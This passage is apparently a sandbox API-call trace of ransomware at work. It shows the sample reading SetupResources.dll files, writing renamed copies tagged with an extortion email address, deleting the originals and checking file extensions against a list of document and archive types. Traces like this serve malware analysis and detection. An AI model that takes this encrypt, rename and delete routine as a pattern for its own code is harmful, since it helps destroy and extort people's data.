(lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.882] GetLastError () returned 0x0 [0046.882] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x3d58, lpOverlapped=0x0) returned 1 [0046.883] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x3d60, lpOverlapped=0x0) returned 1 [0046.886] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.886] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.886] SetEndOfFile (hFile=0x2d0) returned 1 [0046.886] CloseHandle (hObject=0x2d0) returned 1 [0046.887] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.887] SetEndOfFile (hFile=0x2d8) returned 1 [0046.888] CloseHandle (hObject=0x2d8) returned 1 [0046.889] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.889] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 1 [0046.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.889] lstrlenW (lpString=".doc") returned 4 [0046.889] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.889] lstrlenW (lpString=".docx") returned 5 [0046.889] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.889] lstrlenW (lpString=".pdf") returned 4 [0046.889] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.889] lstrlenW (lpString=".xls") returned 4 [0046.889] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.889] lstrlenW (lpString=".xlsx") returned 5 [0046.889] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.890] lstrlenW (lpString=".ppt") returned 4 [0046.890] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString=".zip") returned 4 [0046.890] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString=".rar") returned 4 [0046.890] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString=".bz2") returned 4 [0046.890] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.890] lstrlenW (lpString=".7z") returned 3 [0046.890] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString=".dbf") returned 4 [0046.890] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString=".1cd") returned 4 [0046.890] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString=".jpg") returned 4 [0046.890] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.890] lstrlenW (lpString=".doc") returned 4 [0046.890] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString=".docx") returned 5 [0046.890] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.890] lstrlenW (lpString=".pdf") returned 4 [0046.890] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.890] lstrlenW (lpString=".xls") returned 4 [0046.891] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.891] lstrlenW (lpString=".xlsx") returned 5 [0046.891] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.891] lstrlenW (lpString=".ppt") returned 4 [0046.891] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.891] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.891] lstrlenW (lpString=".zip") returned 4 [0046.891] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.891] lstrlenW (lpString=".rar") returned 4 [0046.891] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.891] lstrlenW (lpString=".bz2") returned 4 [0046.891] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.891] lstrlenW (lpString=".7z") returned 3 [0046.891] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.891] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.891] lstrlenW (lpString=".dbf") returned 4 [0046.891] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.891] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.891] lstrlenW (lpString=".1cd") returned 4 [0046.891] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.891] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0046.891] lstrlenW (lpString=".jpg") returned 4 [0046.891] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.891] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.891] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.892] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.892] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=15192) returned 1 [0046.892] CloseHandle (hObject=0x2d8) returned 1 [0046.892] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 0x80 [0046.892] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.892] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.892] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.892] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.892] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.897] GetLastError () returned 0x0 [0046.897] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x3b58, lpOverlapped=0x0) returned 1 [0046.906] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x3b60, lpOverlapped=0x0) returned 1 [0046.908] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.908] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.908] SetEndOfFile (hFile=0x2d0) returned 1 [0046.908] CloseHandle (hObject=0x2d0) returned 1 [0046.909] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.909] SetEndOfFile (hFile=0x2d8) returned 1 [0046.910] CloseHandle (hObject=0x2d8) returned 1 [0046.910] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.910] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".doc") returned 4 [0046.911] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString=".docx") returned 5 [0046.911] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.911] lstrlenW (lpString=".pdf") returned 4 [0046.911] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString=".xls") returned 4 [0046.911] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString=".xlsx") returned 5 [0046.911] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.911] lstrlenW (lpString=".ppt") returned 4 [0046.911] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".zip") returned 4 [0046.911] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString=".rar") returned 4 [0046.911] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString=".bz2") returned 4 [0046.911] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.911] lstrlenW (lpString=".7z") returned 3 [0046.911] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".dbf") returned 4 [0046.911] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".1cd") returned 4 [0046.911] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".jpg") returned 4 [0046.911] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.911] lstrlenW (lpString=".doc") returned 4 [0046.912] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString=".docx") returned 5 [0046.912] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.912] lstrlenW (lpString=".pdf") returned 4 [0046.912] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString=".xls") returned 4 [0046.912] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString=".xlsx") returned 5 [0046.912] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.912] lstrlenW (lpString=".ppt") returned 4 [0046.912] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.912] lstrlenW (lpString=".zip") returned 4 [0046.912] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString=".rar") returned 4 [0046.912] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.912] lstrlenW (lpString=".bz2") returned 4 [0046.912] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.912] lstrlenW (lpString=".7z") returned 3 [0046.912] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.912] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.912] lstrlenW (lpString=".dbf") returned 4 [0046.912] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.912] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.912] lstrlenW (lpString=".1cd") returned 4 [0046.912] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.912] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0046.912] lstrlenW (lpString=".jpg") returned 4 [0046.912] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.913] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.913] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.913] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.334] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=19288) returned 1 [0047.334] CloseHandle (hObject=0x2e4) returned 1 [0047.334] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 0x80 [0047.334] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.335] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.335] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.336] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.336] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.336] GetLastError () returned 0x0 [0047.336] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x4b58, lpOverlapped=0x0) returned 1 [0047.349] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x4b60, lpOverlapped=0x0) returned 1 [0047.350] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.350] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.350] SetEndOfFile (hFile=0x2d0) returned 1 [0047.351] CloseHandle (hObject=0x2d0) returned 1 [0047.352] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.352] SetEndOfFile (hFile=0x2cc) returned 1 [0047.353] CloseHandle (hObject=0x2cc) returned 1 [0047.353] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.353] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 1 [0047.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.353] lstrlenW (lpString=".doc") returned 4 [0047.353] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.353] lstrlenW (lpString=".docx") returned 5 [0047.354] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.354] lstrlenW (lpString=".pdf") returned 4 [0047.354] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.354] lstrlenW (lpString=".xls") returned 4 [0047.354] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.354] lstrlenW (lpString=".xlsx") returned 5 [0047.354] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.354] lstrlenW (lpString=".ppt") returned 4 [0047.354] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.354] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.354] lstrlenW (lpString=".zip") returned 4 [0047.354] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.354] lstrlenW (lpString=".rar") returned 4 [0047.354] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString=".bz2") returned 4 [0047.355] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.355] lstrlenW (lpString=".7z") returned 3 [0047.355] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString=".dbf") returned 4 [0047.355] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString=".1cd") returned 4 [0047.355] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString=".jpg") returned 4 [0047.355] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString=".doc") returned 4 [0047.355] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString=".docx") returned 5 [0047.355] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.355] lstrlenW (lpString=".pdf") returned 4 [0047.355] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString=".xls") returned 4 [0047.355] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString=".xlsx") returned 5 [0047.355] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.355] lstrlenW (lpString=".ppt") returned 4 [0047.355] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.355] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.355] lstrlenW (lpString=".zip") returned 4 [0047.356] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.356] lstrlenW (lpString=".rar") returned 4 [0047.356] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.356] lstrlenW (lpString=".bz2") returned 4 [0047.356] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.356] lstrlenW (lpString=".7z") returned 3 [0047.356] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.356] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.356] lstrlenW (lpString=".dbf") returned 4 [0047.356] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.356] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.356] lstrlenW (lpString=".1cd") returned 4 [0047.356] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.356] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0047.356] lstrlenW (lpString=".jpg") returned 4 [0047.356] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.356] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.356] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.356] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.357] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=18776) returned 1 [0047.357] CloseHandle (hObject=0x2cc) returned 1 [0047.357] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 0x80 [0047.357] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.357] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.357] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.357] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.357] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.372] GetLastError () returned 0x0 [0047.372] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x4958, lpOverlapped=0x0) returned 1 [0047.373] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x4960, lpOverlapped=0x0) returned 1 [0047.375] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.375] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.375] SetEndOfFile (hFile=0x2d0) returned 1 [0047.375] CloseHandle (hObject=0x2d0) returned 1 [0047.376] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.377] SetEndOfFile (hFile=0x2cc) returned 1 [0047.377] CloseHandle (hObject=0x2cc) returned 1 [0047.377] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.378] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 1 [0047.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.378] lstrlenW (lpString=".doc") returned 4 [0047.378] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString=".docx") returned 5 [0047.378] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned 